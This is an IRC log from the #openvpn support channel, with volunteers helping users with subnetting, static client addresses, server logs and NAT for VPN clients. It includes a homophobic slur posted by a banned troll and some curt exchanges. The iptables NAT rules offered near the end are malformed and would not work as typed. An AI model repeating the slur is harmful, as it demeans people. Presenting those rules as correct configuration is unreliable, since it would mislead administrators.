[~Porkepix@net-2-40-85-103.cust.dsl.teletu.it] has quit [Quit: Computer has gone to sleep.] 00:53 -!- mezgani [~mezgani@41.249.4.68] has quit [Quit: Leaving] 00:57 -!- xtz [xtz@DeathStar.Techn0.eu] has quit [Quit: Lost terminal] 01:09 < latenite> Hi folks, I have a litte trouble choosing the right IP for my vpn server (on a VM) and clients. My openvn server itself is on a subnet/29 I bought from my ISP. The first IP out of that subnet is bound to the br0 interface of the host (for the VMs). The second IP out of the subnet is bound to the eth0 of the VM that runs openvpn. 01:09 < latenite> Now... 01:10 < latenite> What do I set the "server ${serverip }${netmask}" directive out of server.conf to? 01:11 < latenite> This is my Subnet I have: 01:12 < latenite> https://gist.github.com/anonymous/5106133 01:12 <@vpnHelper> Title: gist:5106133 (at gist.github.com) 01:12 < latenite> 5.9.243.145 is the hosts br0 01:13 < latenite> 5.9.243.146 is the VM with openvpn 01:13 < latenite> the rest of the 4 IP want the server to hand out to clients...staticly 01:33 -!- krzee [nobody@openvpn/community/support/krzee] has quit [Read error: Connection reset by peer] 01:38 -!- Porkepix [~Porkepix@157.138.184.18] has joined #openvpn 01:39 -!- mirco [~mirco@p508062C9.dip.t-dialin.net] has quit [Quit: mirco] 01:46 -!- eHAPPY [~V1CE@ip174-73-3-95.no.no.cox.net] has joined #openvpn 01:47 < eHAPPY> ok im really having a hard time getting openvpn setup on linux; is there anyway to get it facing a public IP without generating keys first? it works just fine on my LAN but cant push UDP/TCP to the public IP 01:49 -!- newbie|3 [~tjz@bb219-74-43-126.singnet.com.sg] has quit [Read error: Connection reset by peer] 01:50 -!- tjz [~tjz@unaffiliated/tjz] has joined #openvpn 01:54 -!- DrCode [~DrCode@gateway/tor-sasl/drcode] has quit [Ping timeout: 276 seconds] 01:56 -!- DrCode [~DrCode@gateway/tor-sasl/drcode] has joined #openvpn 02:03 -!- dazo_afk is now known as dazo 02:06 -!- mirco [~mirco@pd95b6029.dip0.t-ipconnect.de] has joined #openvpn 02:08 -!- _ddlk_ [~ddlk@183.246.96.191] has joined #openvpn 02:09 -!- DrCode [~DrCode@gateway/tor-sasl/drcode] has quit [Remote host closed the connection] 02:10 -!- ddlk [~ddlk@ec2-54-235-194-90.compute-1.amazonaws.com] has quit [Read error: Connection reset by peer] 02:10 -!- DrCode [~DrCode@gateway/tor-sasl/drcode] has joined #openvpn 02:22 -!- Porkepix [~Porkepix@157.138.184.18] has quit [Ping timeout: 255 seconds] 02:24 -!- xtz [xtz@DeathStar.Techn0.eu] has joined #openvpn 02:24 -!- Porkepix [~Porkepix@157.138.76.100] has joined #openvpn 02:32 -!- mirco [~mirco@pd95b6029.dip0.t-ipconnect.de] has quit [Quit: mirco] 02:36 -!- Porkepix_ [~Porkepix@ks353551.kimsufi.com] has joined #openvpn 02:38 -!- Porkepix [~Porkepix@157.138.76.100] has quit [Ping timeout: 260 seconds] 02:38 -!- Porkepix_ is now known as Porkepix 02:44 -!- _ddlk_ [~ddlk@183.246.96.191] has quit [Ping timeout: 245 seconds] 02:45 -!- ade_b [~Ade@redhat/adeb] has joined #openvpn 02:54 -!- excalibr [~excalibr@unaffiliated/excalibr] has joined #openvpn 02:54 < excalibr> hello 03:00 -!- excalibr [~excalibr@unaffiliated/excalibr] has quit [Quit: WeeChat 0.4.0] 03:09 -!- zz_AsadH is now known as AsadH 03:10 -!- Saviq [~Saviq@sawicz.net] has quit [Changing host] 03:10 -!- Saviq [~Saviq@canonical/saviq] has joined #openvpn 03:18 -!- Saviq [~Saviq@canonical/saviq] has left #openvpn ["Ex-Chat"] 03:29 -!- DrCode [~DrCode@gateway/tor-sasl/drcode] has quit [Ping timeout: 276 seconds] 03:40 -!- Porkepix [~Porkepix@ks353551.kimsufi.com] has quit [Ping timeout: 248 seconds] 03:47 -!- JSharpe [~JSharpe@46.165.221.13] has joined #openvpn 03:50 -!- Porkepix [~Porkepix@157.138.184.18] has joined #openvpn 03:55 -!- DrCode [~DrCode@gateway/tor-sasl/drcode] has joined #openvpn 03:55 -!- Porkepix [~Porkepix@157.138.184.18] has quit [Ping timeout: 250 seconds] 03:58 -!- Porkepix [~Porkepix@ks353551.kimsufi.com] has joined #openvpn 04:02 -!- JackWinter [~jack@ppp-256.vo.lu] has quit [Quit: ZNC - http://znc.in] 04:03 -!- JackWinter [~jack@ppp-256.vo.lu] has joined #openvpn 04:14 -!- gedO [~quassel@esc.ortopedija.lt] has joined #openvpn 04:14 -!- gedO [~quassel@esc.ortopedija.lt] has quit [Remote host closed the connection] 05:03 -!- MeanderingCode [~Meanderin@199.254.238.216] has quit [Remote host closed the connection] 05:12 -!- AsadH is now known as zz_AsadH 05:15 -!- zz_AsadH is now known as AsadH 05:26 -!- krzee [nobody@hemp.ircpimps.org] has joined #openvpn 05:26 -!- krzee [nobody@hemp.ircpimps.org] has quit [Changing host] 05:26 -!- krzee [nobody@openvpn/community/support/krzee] has joined #openvpn 05:26 -!- mode/#openvpn [+o krzee] by ChanServ 05:33 -!- dxtr [~dxtr@unaffiliated/dxtr] has joined #openvpn 05:42 -!- Porkepix [~Porkepix@ks353551.kimsufi.com] has quit [Ping timeout: 248 seconds] 05:49 -!- TommehM [~TomM@unaffiliated/tommehm] has quit [Excess Flood] 05:57 -!- dxtr [~dxtr@unaffiliated/dxtr] has quit [Quit: Reconnecting] 05:57 -!- dxtr [cfc05a40@unaffiliated/dxtr] has joined #openvpn 06:05 -!- TommehM [~TomM@unaffiliated/tommehm] has joined #openvpn 06:22 -!- lolmaus [~lolmaus@178.236.241.96] has joined #openvpn 06:25 < lolmaus> I've got a virtual machine that i launch on different hosts under different networks. I would like this virtual machine to be available with a static IP. Can i achieve that using OpenVPN and a VDS? 06:31 <+EugeneKay> VDS? 06:31 -!- DrCode [~DrCode@gateway/tor-sasl/drcode] has quit [Ping timeout: 276 seconds] 06:31 < lolmaus> EugeneKay, virtual dedicated server, aka VPS 06:31 <@krzee> venerial disease? 06:31 <@krzee> diseases* 06:31 <+EugeneKay> Then say VPS. 06:31 -!- DrCode [~DrCode@gateway/tor-sasl/drcode] has joined #openvpn 06:32 <+EugeneKay> VDS is a term nobody uses except scumbag OpenVZ providers when they decide to sell you a "premium" instance. 06:32 <+EugeneKay> And yes, you can do that with openvpn+a bit of NAT magic 06:32 <@krzee> watching and loving the fillibuster 06:34 <@plaisthos> virtual dedicated ... 06:34 <+EugeneKay> I try not to care about politics. I can only handle so many stupid people. 06:34 <@plaisthos> would you like some dry water with that? 06:34 <@krzee> haha no kidding 06:35 < rob0> Virus distribution station 06:35 < lolmaus> I can do that too. Vietnamese Professionals Society 06:36 <+EugeneKay> That's not even funny 06:41 <@krzee> womp wommmp 06:42 -!- Porkepix [~Porkepix@ks353551.kimsufi.com] has joined #openvpn 06:46 -!- WinstonSmith [~WinstonSm@unaffiliated/winstonsmith] has quit [Ping timeout: 250 seconds] 06:50 < kjs> Guys, if a openvpn client cant access the cert / key files would it give me an error or just fail to connect ? 06:51 < kjs> I see nothing in the connect server logs when I attempt to connect my client 06:51 -!- lolmaus [~lolmaus@178.236.241.96] has quit [Read error: Connection reset by peer] 06:51 <@krzee> !logs 06:52 <@vpnHelper> "logs" is (#1) is please pastebin your logfiles from both client and server with verb set to 5 or (#2) In the Windows client(OpenVPN-GUI) right-click the status icon and pick View Log or (#3) In the OS X client(Tunnelblick) right-click it nd select Copy log text to clipboard or (#4) if you dont know how to find your logs, see !logfile 06:52 -!- lolmaus [~lolmaus@178.236.241.96] has joined #openvpn 06:53 -!- tjz [~tjz@unaffiliated/tjz] has quit [Ping timeout: 248 seconds] 06:54 -!- WinstonSmith [~WinstonSm@unaffiliated/winstonsmith] has joined #openvpn 07:01 -!- mirco [~mirco@pd95b6029.dip0.t-ipconnect.de] has joined #openvpn 07:02 -!- hg_5 [~chatzilla@unaffiliated/hg-5/x-8664886] has joined #openvpn 07:17 < kjs> i see... 07:17 < kjs> 5/CN=server.does.not.exists/dnQualifier=server 07:18 < kjs> from the client 07:18 < kjs> server side i see notihng 07:31 -!- TommehM [~TomM@unaffiliated/tommehm] has quit [Max SendQ exceeded] 07:32 <@ecrist> kjs: we need to see your logs 07:32 <@ecrist> just because YOU don't see anything doesn't mean we won't 07:37 -!- TommehM [~TomM@unaffiliated/tommehm] has joined #openvpn 07:53 < kjs> ecrist: what I mean is don't see anything server side 07:55 < kjs> in openvpn-status.log 07:56 < kisom> pekster: Hey, did you have time to try out my conf yet? 08:00 <@ecrist> kjs: that's not the log we want 08:00 <@ecrist> the status log is for current connections, and isn't much of a log, really 08:01 -!- krzee [nobody@openvpn/community/support/krzee] has quit [Ping timeout: 248 seconds] 08:13 < kjs> ecrist: where can i find the useful log info ? 08:16 <@ecrist> do you have a verb line in your server config? 08:16 <@ecrist> if not, do like vpnHelper said above and set verb to 5 and restart the server 08:16 <@ecrist> not the whole server, just the openvpn process 08:18 < kjs> Yes 08:18 < kjs> it's there 08:18 <@ecrist> do you have a log line? 08:18 < kjs> i did a reload 08:18 < kjs> not restart, that should sufice ? 08:19 <@ecrist> no 08:20 -!- genghi [~Adium@2.171.156.135] has quit [Remote host closed the connection] 08:20 -!- meepmeep [~meepmeep@there-is-no.endoftheinternet.org] has quit [Ping timeout: 245 seconds] 08:24 -!- mattock [~mattock@openvpn/corp/admin/mattock] has left #openvpn [] 08:24 -!- mattock [~mattock@openvpn/corp/admin/mattock] has joined #openvpn 08:24 -!- mode/#openvpn [+o mattock] by ChanServ 08:33 -!- qmr [~qmr@50.116.18.140] has quit [Ping timeout: 264 seconds] 08:35 -!- speed_racer8 [~speed_rac@c-98-196-168-201.hsd1.tx.comcast.net] has quit [Ping timeout: 248 seconds] 08:36 -!- meepmeep [meepmeep@there-is-no.endoftheinternet.org] has joined #openvpn 08:42 -!- marksaitis [~marksaiti@gemsyorkroad.demon.co.uk] has joined #openvpn 08:44 -!- levifig [~levifig@spwn.co] has joined #openvpn 08:48 -!- speed_racer8 [~speed_rac@c-76-30-149-251.hsd1.tx.comcast.net] has joined #openvpn 08:50 -!- qmr [~qmr@50.116.18.140] has joined #openvpn 08:50 -!- KaiForce [~chatzilla@adsl-70-228-81-145.dsl.akrnoh.ameritech.net] has joined #openvpn 08:51 -!- marksaitis [~marksaiti@gemsyorkroad.demon.co.uk] has quit [Read error: Connection reset by peer] 08:52 -!- roror [~rororo@180.168.11.26] has joined #openvpn 08:53 < levifig> are there any advantages of switching to OpenVPN from L2TP for a network of routers? We basically connect all our client's routers (that we install/use for hosted services) to our VPN concentrator… We're using L2TP at the moment but I've been researching OpenVPN… 08:54 -!- Porkepix [~Porkepix@ks353551.kimsufi.com] has quit [Ping timeout: 252 seconds] 08:55 < kjs> ecrist: I see LTS handshake failed 08:55 < kjs> could it be the CA.crt is wrong that i signed the keys again... 08:55 < levifig> from my research, there doesn't seem to be that big of a benefit for this particular application… We're using MikroTik routers (RouterOS) so we're limited to TCP and no LZO compression anyway on their OpenVPN implementation… 08:57 < kisom> levifig: I'm not really sure why'd you want to migrate a fully functioning L2TP setup? 08:57 < levifig> kisom: actually, I started migrating this from PTPP :) 08:58 < rob0> eww. 08:58 < levifig> kisom: as I'm doing so, I decided to consider OpenVPN 08:58 <@ecrist> kjs: post your logs or piss off 08:58 < levifig> rob0: agree :) 08:58 < levifig> rob0: it was what they had when I got here :X 08:58 -!- roror [~rororo@180.168.11.26] has quit [Ping timeout: 252 seconds] 08:59 < kisom> levifig: Performance-wise I don't think OpenVPN has any huge advantage over L2TP. 08:59 < rob0> Nice thing about OpenVPN is that it's modular. If something is wrong in part of it, such as the openssl libraries, it's easier to fix. 08:59 < rob0> Performance-wise ipsec should generally win, but not by a major factor. 09:02 < levifig> the problem I'm facing is the whole certificate nightmare 09:02 < levifig> for what we do, user/secret tends to be easier 09:03 < levifig> since these are machines connecting to each other, with no user access (just admin), the security/streamlined certificate access seems to be too much work for what it gives… 09:03 < levifig> am I missing something or does this make sense? 09:05 -!- meepmeep [meepmeep@there-is-no.endoftheinternet.org] has quit [Ping timeout: 256 seconds] 09:07 -!- Porkepix [~Porkepix@ks353551.kimsufi.com] has joined #openvpn 09:12 -!- EasterBunny [mis7er@kn.ock.in] has joined #openvpn 09:13 -!- meepmeep [meepmeep@there-is-no.endoftheinternet.org] has joined #openvpn 09:14 < kjs> ecrist: pretty rude, I can't paste server side logs only access is via console which is why I typed that part of the log. I don't expect help here but I also don expect to be told to piss off. 09:15 < EasterBunny> yeah ecrist fag 09:15 -!- mode/#openvpn [+o EugeneKay] by ChanServ 09:15 -!- mode/#openvpn [+b *!*mis7er@*.ock.in] by EugeneKay 09:15 -!- EasterBunny was kicked from #openvpn by EugeneKay [Easter is next month] 09:16 < kisom> levifig: And what happens when a user roots your hardware? 09:16 < kisom> levifig: Certificates can be revoked, shared secrets cant. 09:16 <@EugeneKay> !both 09:16 <@vpnHelper> "both" is If you do not control both ends of the link (server and client) then there is not much we can do to help you. Please talk to your network admin instead. 09:16 <@ecrist> lol 09:16 <@EugeneKay> kjs ^ that's why we ask for server logs. 09:16 <@EugeneKay> !refund 09:16 < kjs> I understand... 09:16 <@EugeneKay> Hrm, guess this bot doesn't have it 09:17 <@ecrist> kjs: didn't we discuss this copy/paste thing the other day? 09:17 -!- EasterBunny [mis7er@fedcirc.net] has joined #openvpn 09:17 -!- mode/#openvpn [+b *!*@fedcirc.net] by ecrist 09:17 -!- EasterBunny was kicked from #openvpn by ecrist [EasterBunny] 09:17 < levifig> kisom: hmmm… good point! 09:17 * dazo wonders what he missed about EasterBunny now :) 09:17 < kjs> ecrist: no ? 09:17 -!- EasterBunny [mis7er@dumbhead.net] has joined #openvpn 09:17 < EasterBunny> it's this month 09:18 < EasterBunny> 31st 09:18 -!- mode/#openvpn [+b *!*@dumbhead.net] by ecrist 09:18 -!- EasterBunny was kicked from #openvpn by ecrist [EasterBunny] 09:18 -!- mode/#openvpn [+b EasterBunny!*@*] by EugeneKay 09:18 < kjs> actually i can get the logs 09:18 * dazo suddenly understood it 09:18 < kjs> ill email myself the file - doh! 09:18 <@EugeneKay> kjs - what's wrong with SSH? 09:19 < kjs> I cant access that host via ssh it's on a sep isolated subnet. 09:19 < kjs> unles I connect over the vpn... Which obviously I can't 09:19 < kjs> ;) 09:19 <@EugeneKay> If you can get mail out, you can get SSH in 09:19 < levifig> kisom: if we had a CA setup it'd be a good thing… we just don't have that in our infrastructure ATM :X 09:19 <@EugeneKay> It just takes a lil networking 09:19 < kjs> yeah its setup like this for a reason 09:19 <@ecrist> levifig: a CA would be ideal 09:19 < kjs> and no, not just to piss me off... 09:20 < kisom> levifig: Also, OpenVPN over TCP is broken at the moment, so if microtik can only use TCP then I'd stick to L2TP. 09:20 <@ecrist> kisom: it is? 09:20 < levifig> :o 09:20 < kisom> ecrist: Ticket 263. 09:20 < kisom> Nobody seems to notice it. 09:21 < kisom> I'm just about to post to openvpn-devel 09:21 <@dazo> kisom: I'm using 2.3 with TCP successfully 09:21 <@dazo> on two different servers 09:21 <@EugeneKay> !learn refund as If you are not satisfied with the GPL openvpn, or the support provided by the volunteers of #openvpn, you are entitled to a full refund of the purchase price and are invited to use another VPN solution. Elsewhere. 09:21 <@vpnHelper> Error: You don't have the factoids.learn capability. If you think that you should have this capability, be sure that you are identified before trying again. The 'whoami' command can tell you if you're identified. 09:21 <@dazo> and a couple of clkients 09:21 <@EugeneKay> Damn you, bot. 09:22 < kisom> dazo: It works when the network load isn't too high. 09:22 < kisom> If you send packets faster than the connection can handle, the connection breaks and openvpn reports a crypto error. 09:22 <@plaisthos> !learn refund as If you are not satisfied with the GPL openvpn, or the support provided by the volunteers of #openvpn, you are entitled to a full refund of the purchase price and are invited to use another VPN solution. Elsewhere. 09:22 <@vpnHelper> Joo got it. 09:22 <@plaisthos> EugeneKay: no idea why it does not like you 09:22 < kisom> It's all explained in the ticket + config files to be used for reproducing the bug. 09:23 <@ecrist> EugeneKay: it's borked again 09:23 <@ecrist> krzee *fixed* it 09:23 <@EugeneKay> plaisthos - because I'm not on an @openvpn/ cloak; my bot account was separate, and ecrist hasn't fixed it since he borked the bot. 09:23 <@ecrist> no, I fixed it, and krzee re-fixed it 09:23 <@EugeneKay> Ah. 09:23 <@EugeneKay> Well, fix harder 09:23 < rob0> !blame 09:23 <@vpnHelper> "blame" is (#1) According to Bushmills, it's always krzee's fault or (#2) According to krzee, it's always dazo's fault or (#3) and dazo will always blame EugeneKay, Bushmills, ecrist or any other sensible victims in the required moments or (#4) cron2 says its always d12fk's fault (and sometimes the customers) 09:23 <@ecrist> heh 09:24 <@plaisthos> EugeneKay: you try to get a refund from the bot ;) 09:24 <@ecrist> !learn refund as If you are not satisfied with the GPL openvpn, or the support provided by the volunteers of #openvpn, you are entitled to a full refund of the purchase price and are invited to use another VPN solution. Elsewhere. 09:24 <@vpnHelper> Error: You don't have the factoids.learn capability. If you think that you should have this capability, be sure that you are identified before trying again. The 'whoami' command can tell you if you're identified. 09:24 <@EugeneKay> Meh, I wore my OpenVPN shirt yesterday. I think that's good enough. 09:24 <@ecrist> :( 09:24 <@EugeneKay> Today it's my Tor shirt 09:24 <@plaisthos> !whoami 09:24 <@vpnHelper> developers 09:25 -!- krzee [nobody@openvpn/community/support/krzee] has joined #openvpn 09:25 -!- mode/#openvpn [+o krzee] by ChanServ 09:26 -!- xtz [xtz@DeathStar.Techn0.eu] has quit [Quit: leaving] 09:28 <@ecrist> plaisthos: can you add that factoid, please? 09:29 <@EugeneKay> He did. 09:29 <@EugeneKay> !refund 09:29 <@vpnHelper> "refund" is If you are not satisfied with the GPL openvpn, or the support provided by the volunteers of #openvpn, you are entitled to a full refund of the purchase price and are invited to use another VPN solution. Elsewhere. 09:29 < kjs> haha 09:32 <@ecrist> oh,neat 09:32 < kisom> dazo: Can you try flooding a client over your VPN and see if it disconnects? :) 09:32 -!- MacGyver [~MacGyver@unaffiliated/macgyvernl] has joined #openvpn 09:34 < MacGyver> I've got two questions. First, if I run OpenVPN on the client not in daemon mode, and drop privileges after startup, how can I ever get it to cleanly remove its routes when closing the tunnel using ctrl+C? 09:35 -!- corretico [~luis@190.211.93.38] has quit [Ping timeout: 256 seconds] 09:35 < MacGyver> Second, suppose I'm on a network whose DNS I want to continue to use, but *only* for the domain "localdomain", and for all others I want to use the pushed DNS. Furthermore, as soon as the VPN closes, the domains DNS-server should be used again for all domains. Is there any easy way to do that? 09:36 <@dazo> kisom: I'll try ... don't have time right now, but will run some tests on that 09:40 < kisom> dazo: OK, fair enough. If you're running a layer 2 network and have --client-to-client enabled then you can flood the broadcast address, causing all clients to disconnect. 09:41 * dazo uses TUN ;-) 09:41 <@dazo> (and no client-to-client) 09:41 < kisom> I would too if I didn't need broadcasts ;) 09:47 -!- lolmaus [~lolmaus@178.236.241.96] has quit [] 09:49 -!- mattock is now known as mattock_afk 09:50 < latenite> Hi folks, can someone please help me with my IP issue I've got? 09:50 < pulz> im trying to add static ip to a openvpn client based on the ca, using the ipconfig-push 10.8.0.250 10.8.0.0; command, but it doesnt seem to work, any suggestions ? 09:51 <@dazo> !ask 09:51 <@vpnHelper> "ask" is don't ask to ask, just ask your question please, see this link for how to get help on IRC: http://workaround.org/getting-help-on-irc 09:51 <@dazo> latenite: ^^^ 09:52 < latenite> Hi folks, I have a litte trouble choosing the right IP for my vpn server (on a VM) and clients. My openvn server itself is on a subnet/29 I bought from my ISP. The first IP out of that subnet is bound to the br0 interface of the host (for the VMs). The second IP out of the subnet is bound to the eth0 of the VM that runs openvpn. 09:52 < latenite> Now... 09:52 < latenite> What do I set the "server ${serverip }${netmask}" directive out of server.conf to? 09:52 < latenite> This is my Subnet I have: 09:52 < latenite> https://gist.github.com/anonymous/5106133 09:52 <@vpnHelper> Title: gist:5106133 (at gist.github.com) 09:53 < MacGyver> pulz: 10.8.0.0 is not a valid IP-address. 09:53 < MacGyver> pulz: Or rather. 09:53 < MacGyver> pulz: It's not a valid host address. 09:53 < latenite> ...throuble is: What is I set it to "server 5.9.243.144 255.255.255.248" ? Then the server itself woulge get 5.9.243.145 wich is already assingend to the VM running openvpn 09:53 <@dazo> latenite: for simplicity ... use an !rfc1918 address 09:54 <@dazo> !rfc1918 09:54 <@dazo> !1918 09:54 <@vpnHelper> "1918" is (#1) RFC1918 makes three unique netblocks available for private use: 10.0.0.0/8, 172.16.0.0/12, and 192.168.0.0/16 or (#2) see also: http://en.wikipedia.org/wiki/Private_network or http://www.faqs.org/rfcs/rfc1918.html or (#3) Too lazy to find your own subnet? Try this one: http://scarydevilmonastery.net/subnet.cgi 09:54 < latenite> dazo, MacGyver I know its the network address 09:54 * dazo thinks MacGyver replied to pulz, though .... 09:55 < latenite> I did get me a Range of IPs that are "real" and not rfc1918 ...so I can hand them out to clients of the vpn 09:55 < latenite> ..but I already use 2 of them for the hosts bridge and the VM running openvpn 09:55 < MacGyver> latenite: Unless you and pulz are the same person / team, I wasn't replying to your issue. 09:55 < latenite> MacGyver, ohh ok. sorry :D 09:55 <@dazo> latenite: it's possible to do so too ... but it may cause you extra challenges when starting to do the routing .... using rfc1918 for VPNs is *the* recommended way 09:56 <@dazo> latenite: if you want your clients to have static public IP addresses when surfing the net ... I'd probably rather recommend doing NAT on the VPN server side 09:56 < latenite> dazo, but then my clients would get rfc1918 IPs. How would they get to use the internet? 09:56 <@dazo> latenite: NAT 09:57 < pulz> MacGyver: based on http://openvpn.net/index.php/open-source/documentation/howto.html#policy it should use 2 seqential ips ? 09:57 <@vpnHelper> Title: HOWTO (at openvpn.net) 09:57 < latenite> dazo, But I can only DNAT one client than. Right? 09:57 < MacGyver> pulz: They don't have to be sequential, but you cannot use the all-zeroes address. 09:57 < MacGyver> pulz: 10.8.0.1 would be fine, probably. 09:58 < latenite> dazo, I talked about that to "pakster" the other day. He realy helped me a lot on getting started with openvpn 09:58 < pulz> what is the second ip adress ?, the first one is the ip adress the client gets assigned ? 09:58 < latenite> he recommended not to use NAT but rather have public IPs 09:58 <@dazo> latenite: you do that on the server side, and ignore what the clients have/use ... as you can't ever trust clients to do the right thing ... you primarily control the server 09:59 <@dazo> (nitpick ... you can only control the client 100% if it is your own workstation/laptop/whatever, which you use every day ... if others start the VPN connection, even through an automatic boot script, you can't fully trust the client) 09:59 < latenite> dazo, sorry? What exactly do I do on the server side? 09:59 <@dazo> latenite: the NAT 10:00 < latenite> dazo, oh sure I do the DNAT on the server side. But I was told and still belive that this **only** works for one client at once 10:01 <@dazo> latenite: not necessarily ... you need SNAT on the server side too, I'd presume 10:01 < latenite> Internet -> VPN-server -> DNAT -> client(s) 10:01 < latenite> but no plural for "client(s)" 10:01 <@dazo> And: client(s) -> VPN-server -> SNAT -> Internet 10:02 < MacGyver> pulz: Oh, my mistake, just a second. 10:03 < latenite> dazo, could you help me setting that up? I have the server up and running. I am just unsure on how(and which) IPs to push to the clients. So the clients can use the VPN connection to get online freely 10:03 <@dazo> latenite: so you need in PREROUTING DNAT rules which maps the public IP addresses of your clients to their VPN IP addresses ... and then POSTROUTING SNAT which maps the VPN IP address to their public IP address 10:03 <@dazo> latenite: and then you just use plain rfc1918 addresses on the VPN tunnel 10:04 < MacGyver> pulz: Sorry, I had things mixed up with ifconfig there. Assuming ipconfig-push is analogous to ifconfig-push, the first address is the address that gets assigned, the second should be the netmask, not an address. 10:04 -!- goldkatze [~nobody@unaffiliated/goldkatze] has joined #openvpn 10:04 < MacGyver> pulz: 10.8.0.0 is not a netmask. 255.255.0.0, e.g, is. 10:05 < latenite> dazo, would you know a tutorial or wiki on that? I am totaly new and super lost when it comes to setting up these rule. 10:05 <@dazo> iptables -t nat -I PREROUTING -i eth0 -d $PublicIP --to-destination $VPNIP 10:05 <@dazo> iptables -t nat -I POSTROUTING -i tun0 -d $VPNIP --to-destination $PublicIP 10:05 < pulz> MacGyver: are you shure, ref this http://openvpn.net/index.php/open-source/documentation/howto.html#policy 10:05 <@vpnHelper> Title: HOWTO (at openvpn.net) 10:06 <@dazo> pulz: 10.8.0.0 netmask 255.255.255.0 ..... here 10.8.0.0 is a network address ... and 10.8.0.1 is the first host address 10:06 <@dazo> !tcpip 10:06 <@vpnHelper> "tcpip" is http://www.redbooks.ibm.com/redbooks/pdfs/gg243376.pdf See chapter 3.1 for useful basic TCP/IP networking knowledge you should probably know 10:06 <@ecrist> that's a nice link, dazo 10:07 < MacGyver> pulz: I'm 99% sure. 10:07 < MacGyver> pulz: I'm getting it from the openvpn manpage. The way I see it, there's two possibilities: 10:07 <@dazo> ecrist: thx! :) 10:08 < MacGyver> -Either the manpage is right, and that howto-link is wrong, in which case you should be using the netmask, or: 10:08 < MacGyver> -The manpage is wrong (or I'm interpreting it wrong), in which case you should be using a valid IP-address. 10:08 < latenite> dazo, are these the only two lines I need? Where do I put them to try it out? 10:08 < MacGyver> Either way, 10.8.0.0 is *not* a valid entry for the second argument to ipconfig-push 10:08 <@dazo> pulz: Both is right ... 10.8.0.0/24 means the 10.8.0.0 subnet ... where .0 is the network address and .1 is the first host address 10:09 <@dazo> MacGyver: ^^ 10:09 < pulz> since i add this as client override, should the openvpn push this config to client ? 10:09 < pulz> without touching client configs ? 10:09 <@dazo> pulz: MacGyver: The wiki/howto says "Virtual IP Range" and "subnet" 10:10 <@dazo> which means exactly what I've said twice now :) 10:10 <@dazo> latenite: if you have rfc1918 addresses, then yes ... that should be it 10:10 < MacGyver> dazo: Then my manpage is incomplete, I guess. 10:10 <@dazo> latenite: but that maps all port ranges ... you may consider to only allow this for a limited set of ports, though ... but that's kind of hardening this setup 10:11 <@dazo> MacGyver: which section do you look at? 10:11 <@dazo> (afair, the man page is quite correct on terminologies) 10:11 < pulz> it seems like there is 2 possible ways to set this in pfsense 2.x ref https://dl.dropbox.com/u/19352103/ovpn-static.PNG 10:11 < pulz> or are i completly wrong ? 10:12 < pulz> and yes i know that the ips are diffrent, just entered data for screenshot 10:12 <@dazo> pulz: 10.0.8.240/30 ... that gives you a small subnet with only 4 IP addresses .... 10.0.8.240 is the network address, 10.0.8.241 is the first host address, 10.0.8.242 is the second IP address and 10.0.8.243 is the broadcast address 10:13 < latenite> dazo, How do I do it? How where do I put these lines? 10:13 <@dazo> latenite: that's command line stuff ... this isn't strictly openvpn ... that's iptables setup 10:13 < MacGyver> dazo: Yeah, it appears you're right. I think I'm being confused by the manpage listing --ifconfig l rn, then explaining that rn can stand for an address in the case of tun, or a netmask in the case of tap, and --ifconfig-push *not* making that distinction as well as expanding rn to remote-netmask. 10:14 < pulz> dazo: your correct, i missread what the tunnel network options is for 10:15 -!- mattock_afk is now known as mattock 10:15 < MacGyver> I didn't check back with --ifconfig when I was reading --ifconfig-push, so I took address-netmask literally as netmask. 10:15 -!- raidz_away is now known as raidz 10:15 < kjs> Guys ecrist http://fpaste.org/RRTO/ serverside log 10:15 <@dazo> MacGyver: yeah ... --ifconfig can be confusing .... depending on if you are in p2p mode, p2mp (--server), if it's tun or tap mode and --topology setting as well 10:15 < latenite> dazo, so on the VM that runs openvpn all I do is: iptables -t nat -I PREROUTING -i eth0 -d 5.9.243.146 --to-destination *WHAT GOES HERE? * ? 10:15 <@dazo> MacGyver: depending on these combos ... the --ifconfig syntax may differ 10:15 <@dazo> latenite: the IP address of your VPN client 10:16 <@dazo> the VPN IP address given out by OpenVPN to your VPN client 10:16 < pulz> so using my first value actually should work ? "ipconfig-push 10.0.8.249 10.0.8.0"; ; 10:16 < kjs> does the CN on the certs have to be the same on each side ? 10:16 < pulz> without the double ; ofcourse 10:16 < latenite> dazo, so that actually has to happen dynamicaly? Since I will have multiple clients 10:17 <@dazo> latenite: or you can just have static mapping ... that VPN IP address .1 always gets mapped to 5.9.243.146 .... .2 always gets 5.9.243.147 ... and so on 10:18 <@dazo> latenite: which distro do you use? 10:19 < latenite> dazo, gentoo 10:19 < MacGyver> pulz: No. Like I said, the .0-address is not valid there, in either case. You cannot assign the network address, which is the first address in a subnet, to a client. 10:20 < latenite> dazo, now I am confused. Since 5.9.243.146 is not rfc1980 as you recommendet it to be 10:20 <@dazo> latenite: okay ... then remember to save your iptables setup before you boot .... /etc/init.d/iptables save ... iirc .... or hack on /var/lib/iptables/rules-save ... or whatever it was again 10:20 < MacGyver> pulz: If you're using routing mode, you *must* specify a valid address. 10:20 < pulz> so 2 successive ips are the correct? from what i can find from googling atleast ? 10:20 < MacGyver> pulz: They don't have to be successive. They only have to be in the same subnet *and valid host addresses for that subnet*. 10:21 < latenite> iptables -t nat -I PREROUTING -i eth0 -d 5.9.243.146 --to-destination 5.9.243.146 OR 10.8.0.2 ? 10:21 < latenite> dazo, ^ 10:21 < pulz> MacGyver: but the problem is that nothing gets pushed anyway 10:21 < pulz> from psense that is 10:21 < MacGyver> pulz: Successive IP's will most likely satisfy that requirement, yes, but if your subnet is 10.8.0.0/24, then using 10.8.0.1 and 10.8.0.240 is fine. 10:22 < MacGyver> pulz: More likely is that you're not seeing it getting pushed because it's not a valid address to push. 10:22 <@dazo> latenite: what these SNAT/DNAT rules does is to provide a public IP address for your VPN clients .... so that if you have a client 10.8.0.2 mapped to 5.9.243.146 (DNAT/SNAT rules) ... whenever that client surfs the net over the VPN ... it's public IP will be 5.9.243.146 .... and when stuff on the Internet talks with your VPN client ... it will talk to the public 5.9.243.146 IP ... then your OpenVPN servers' iptables setup changes that to t 10:22 <@dazo> he 10.8.0.2 address before sending the traffic through the tunnel 10:23 < pulz> MacGyver: the dhcp pool is 10.0.8.x, so im testing "ipconfig-push 10.0.8.249 10.0.8.250"; 10:23 < MacGyver> pulz: Ah, now *that* should work, yes. 10:23 <@dazo> DNAT/SNAT modifies the destination and source IP address ... and the iptables stuff keeps track of which internal IP address have which connections open 10:23 < pulz> MacGyver: but nothing happends :/ 10:24 < pulz> i should see it from console right j? 10:24 < latenite> dazo, ahhh 